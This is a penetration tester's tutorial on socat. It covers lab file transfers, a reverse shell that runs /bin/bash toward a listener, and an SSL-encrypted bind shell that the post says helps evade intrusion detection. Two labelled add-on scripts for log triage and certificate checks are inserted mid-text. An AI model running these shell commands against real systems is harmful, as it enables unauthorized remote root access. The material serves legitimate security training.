congdong007

Penetration Tester, Software Developer


Socat

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data
between them. For penetration testing, it is similar to Netcat but has additional useful features.

While there are a multitude of things that socat can do, we will only cover a few of them to illustrate
its use.

Socat File Transfers

Server side:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# socat TCP4-LISTEN:443,fork file:nmap-list.txt

Client side:

C:\Users\Administrator\Desktop\socat> socat TCP4:192.168.244.140:443 file:nmap-list.txt,create
C:\Users\Administrator\Desktop\socat> type nmap-list.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 23:19 EDT
Warning: 199.241.133.26 giving up on port because retransmission cap hit (10).
Stats: 0:07:04 elapsed; 0 hosts completed (64 up), 64 undergoing SYN Stealth Scan
...

Socat Reverse Shells

Server side:

C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[5640] N listening on AF=2 0.0.0.0:443

Client side, where we run the following command:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# socat TCP4:192.168.244.144:443 EXEC:/bin/bash

The server side then looks like this:

C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[5640] N listening on AF=2 0.0.0.0:443
... socat[5640] N accepting connection from AF=2 192.168.244.140:54720 on 192.168.244.144:443
... socat[5640] N using stdout for reading and writing
... socat[5640] N starting data transfer loop with FDs [4,4] and [1,1]
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
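The `-d -d` diagnostics in the listener output above are also what ends up in a log if a socat listener's console is captured. The following script, added here and not part of the original post, parses lines in that exact format (the sample log is constructed; the timestamps are made up) into listener and connection events and flags peers outside an allow-list, which is the first thing to check when a shell handler shows more than one connection.

```shell
#!/bin/sh
# Added example (not from the original post). Turns socat "-d -d" diagnostics,
# the same format shown in the listener output above, into a short event list a
# defender can triage. The log below is constructed; timestamps are made up.

SOCAT_LOG='2023/09/17 23:25:01 socat[5640] N listening on AF=2 0.0.0.0:443
2023/09/17 23:25:40 socat[5640] N accepting connection from AF=2 192.168.244.140:54720 on 192.168.244.144:443
2023/09/17 23:25:40 socat[5640] N using stdout for reading and writing
2023/09/17 23:25:40 socat[5640] N starting data transfer loop with FDs [4,4] and [1,1]
2023/09/17 23:31:02 socat[5640] N accepting connection from AF=2 10.0.0.7:40112 on 192.168.244.144:443'

# One line per event: "LISTEN <bind-addr>" or "CONNECT <peer> -> <local>"
socat_events() {    # $1 = log text
    printf '%s\n' "$1" | awk '
        /N listening on AF=/ { print "LISTEN " $NF; next }
        /N accepting connection from AF=/ {
            for (i = 1; i <= NF; i++) if ($i == "from") peer = $(i + 2)  # skip "AF=2"
            print "CONNECT " peer " -> " $NF
        }'
}

# Number of accepted connections; a bind or reverse shell normally has exactly one
socat_connection_count() {    # $1 = log text
    socat_events "$1" | grep -c '^CONNECT '
}

# Peers whose IP is not in the space-separated allow-list: a connection from an
# address the engagement does not use is worth a closer look.
socat_unexpected_peers() {    # $1 = log text, $2 = allowed IPs
    socat_events "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "CONNECT" { ip = $2; sub(/:[0-9]+$/, "", ip); if (!(ip in ok)) print ip }'
}

socat_events "$SOCAT_LOG"
socat_unexpected_peers "$SOCAT_LOG" "192.168.244.140"
```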

Socat Encrypted Bind Shells

To add encryption to a bind shell, we will rely on Secure Sockets Layer (SSL) certificates. This level of
encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive
data we are transceiving.

To continue with the example, we will use the openssl application to create a self-signed certificate using the following options:
• req: initiate a new certificate signing request
• -newkey: generate a new private key
• rsa:2048: use RSA encryption with a 2,048-bit key length.
• -nodes: store the private key without passphrase protection
• -keyout: save the key to a file
• -x509: output a self-signed certificate instead of a certificate request
• -days: set validity period in days
• -out: save the certificate to a file

Once we generate the key, we will cat the certificate and its private key into a file, which we will
eventually use to encrypt our bind shell.

Server side:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
...+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.+.....+.+...+.....+......+.+......+.....+.......+.....+...............+.+.....+.+......+...+..+....+...+...+..................+.........+...+.....+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+......+......+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
.+.+......+...+..+.+.....+.........+......+...+.........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*..............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*....+....+........+....+.....+.+.....+...+.......+..+.......+........+.+.....+.+...+........+.........+..................+......+.........+......+..........+.........+..+....+.........+......+.........+...+..+...+....+........+......+.+.........+......+...........+...+.......+...........................+.....+.......+......+........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CA
State or Province Name (full name) [Some-State]:Quebec
Locality Name (eg, city) []:Montreal
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Raohua
Organizational Unit Name (eg, section) []:Try Harder Department
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat bind_shell.key bind_shell.crt > bind_shell.pem

┌──(root㉿kali)-[/home/kali/Desktop]
└─# socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Client side:

C:\Users\Administrator\Desktop\socat> socat - OPENSSL:192.168.244.140:443,verify=0
id
uid=0(root) gid=0(root) 0=1000(root)
whoami
root
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:f9:b4:b9 brd ff:ff:ff:ff:ff:ff
inet 192.168.244.140/24 brd 192.168.244.255 scope global dynamic noprefixroute eth0
valid_lft 1168sec preferred_lft 1168sec
inet6 fe80::9d6e:bd4e:a4b2:6ffb/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:1d:28:b9:62 brd ff:ff:ff:ff:ff:ff
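The same certificate workflow as above, as an added example that is not part of the original post: it runs openssl non-interactively with the DN values typed at the prompts, assembles bind_shell.pem the way the post does, and then checks that the private key actually belongs to the certificate and prints the fingerprint a client could pin instead of relying on verify=0 (which accepts any certificate). It assumes the openssl CLI is installed; the `--demo` flag is a convention of this script only.

```shell
#!/bin/sh
# Added example (not from the original post). Builds bind_shell.pem the way the
# post does, but without the interactive prompts, then sanity-checks the result.
# Assumes the openssl CLI is available.

make_pem() {    # $1 = output directory
    dir="$1"
    # -subj carries the DN fields the post typed at the prompts; -days 362 as in the post
    openssl req -newkey rsa:2048 -nodes -keyout "$dir/bind_shell.key" -x509 -days 362 \
        -subj "/C=CA/ST=Quebec/L=Montreal/O=Raohua/OU=Try Harder Department" \
        -out "$dir/bind_shell.crt" 2>/dev/null || return 1
    # socat's cert= option expects key and certificate in one PEM file, key first
    cat "$dir/bind_shell.key" "$dir/bind_shell.crt" > "$dir/bind_shell.pem" || return 1
    chmod 600 "$dir/bind_shell.key" "$dir/bind_shell.pem"   # both contain the private key
}

# Succeeds only if the private key belongs to the certificate: the public key
# derived from each must be byte-identical. Catches a stale or mixed-up PEM.
pem_key_matches_cert() {    # $1 = combined PEM file
    k=$(openssl pkey -in "$1" -pubout 2>/dev/null) || return 1
    c=$(openssl x509 -in "$1" -noout -pubkey 2>/dev/null) || return 1
    [ -n "$k" ] && [ "$k" = "$c" ]
}

# SHA-256 fingerprint of the certificate. With verify=0 the client accepts any
# certificate; giving it this value (or bind_shell.crt via socat's cafile=
# option) lets it verify the listener instead.
cert_fingerprint() {    # $1 = PEM file holding the certificate
    openssl x509 -in "$1" -noout -fingerprint -sha256 | sed 's/^.*=//'
}

# Stand-alone run: build into a temporary directory and report.
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d)
    make_pem "$d" && pem_key_matches_cert "$d/bind_shell.pem" \
        && echo "bind_shell.pem OK, fingerprint $(cert_fingerprint "$d/bind_shell.pem")"
    rm -rf "$d"
fi
```

Run it with `--demo` to generate into a temporary directory; the generated bind_shell.pem is what the `cert=` option in the server command above expects.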